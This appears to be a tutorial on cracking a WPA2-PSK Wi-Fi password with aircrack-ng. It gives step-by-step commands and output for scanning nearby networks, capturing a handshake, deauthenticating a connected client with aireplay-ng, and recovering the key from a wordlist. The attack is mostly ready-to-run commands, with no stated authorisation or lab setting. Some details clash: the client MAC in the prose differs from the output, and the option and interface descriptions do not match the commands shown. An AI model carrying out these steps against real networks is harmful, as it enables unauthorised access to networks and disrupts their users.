Methodology
- First, we’ll need to capture a handshake.
- Next, we will make a guess at the passphrase and send that guess into the hash function.
- We will then compare the output from the hash function to the handshake.
Capturing the Handshake
We will identify the channel of the target AP and gather its BSSID to limit our capture with airodump-ng.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
sudo airodump-ng wlan0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:XX -67 4 0 0 11 720 WPA2 CCMP PSK PUMA5_GOL
XX:XX:XX:XX:XX:XX -69 4 0 0 8 130 WPA2 CCMP PSK Total play may
XX:XX:XX:XX:XX:XX -71 3 0 0 2 130 OPN ClubTotalplay_WiFi_2.4G
XX:XX:XX:XX:XX:XX -49 28 0 0 11 195 WPA2 CCMP PSK TOTALPLAY_220C3C
XX:XX:XX:XX:XX:XX -61 12 0 0 11 130 WPA2 CCMP PSK INFINITUM37FA
XX:XX:XX:XX:XX:XX -67 13 0 0 11 130 WPA2 CCMP PSK IZZI-F0AC
XX:XX:XX:XX:XX:XX -38 24 3 0 11 195 WPA2 CCMP PSK IZZI-F0AC
XX:XX:XX:XX:XX:XX -68 3 0 0 6 130 OPN MXConectado-E
XX:XX:XX:XX:XX:XX -66 4 0 0 6 540 WPA2 CCMP PSK IZZI-D49A
XX:XX:XX:XX:XX:XX -61 13 1 0 8 130 WPA2 CCMP PSK INFINITUM1500
7C:13:1D:B2:3D:A4 -29 42 19 0 5 130 WPA2 CCMP PSK Not_Of_Your_Buzzinez <----
BSSID STATION PWR Rate Lost Frames Notes Probes
XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX -67 0 - 1e 0 1
XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX -69 1e- 1e 0 3
XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX -69 0 - 1e 0 2
7C:13:1D:B2:3D:A4 1E:F4:C6:7B:66:C1 -32 0 - 1e 0 1 <----
XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX -71 0 - 1e 502 6
XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX -1 1e- 0 0 72
Our target is the ‘Not_Of_Your_Buzzinez’ AP, which operates on channel 5. Its BSSID is 7C:13:1D:B2:3D:A4 and it has one client with a MAC address of 00:18:4D:1D:A8:1F. The AUTH column shows the AP has an authentication type of PSK. This is a good sign. aircrack-ng does not work when the authentication is Enterprise (MGT), as it requires a different set of tools. Opportunistic Wireless Encryption cannot be cracked yet.
Then we proceed to capture the packet as follows:
1
sudo airodump-ng -c 5 -w wpa --essid 'Not_Of_Your_Buzzinez' --bssid 7C:13:1D:B2:3D:A4 wlan0
With the airodump-ng running we then proceed to deauthenticate the user from the AP with aireplay-ng. We’ll use the -0 1 option to deauthenticate once, and -a to target our BSSID. We’ll use -c to identify the associated client, and finally specify wlan0mon for our listening interface.
1
2
3
4
sudo aireplay-ng -0 10 -a 7C:13:1D:B2:3D:A4 -c 1E:F4:C6:7B:66:C1 wlan0
13:30:30 Waiting for beacon frame (BSSID: 7C:13:1D:B2:3D:A4) on channel 1
13:30:30 Sending 64 directed DeAuth (code 7). STMAC: [1E:F4:C6:7B:66:C1] [ 0| 0 ACKs]
Aireplay-ng checks that the BSSID exists before sending the deauthentication packets. Once the client reconnects with the target AP, airodump-ng will be able to capture a handshake.
1
CH 5 ][ Elapsed: 52 s ][ 2020-02-29 13:31 ][ WPA handshake: 1E:F4:C6:7B:66:C1
Cracking the Hash
Now that we have captured a handshake, cracking it is relatively easy. We run aircrack-ng against our recently created capture file, wpa-01.cap. We’ll use a list of commonly used passwords, also known as a wordlist, located at /usr/share/john/password.lst. We’ll use -w to specify the path to our wordlist. Next, we’ll use -e to indicate which ESSID to target, and then -b to specify the BSSID.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
aircrack-ng -w /usr/share/john/password.lst -e 'Not_Of_Your_Buzzinez' -b 7C:13:1D:B2:3D:A4 wpa-01.cap
Aircrack-ng 1.7
[00:00:00] 2/5 keys tested (214.45 k/s)
Time left: 0 seconds 40.00%
KEY FOUND! [ Th1s1s0bvi0uslyN0tTh3P4ssw0rd ]
Master Key : XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
Transient Key : XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
EAPOL HMAC : XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX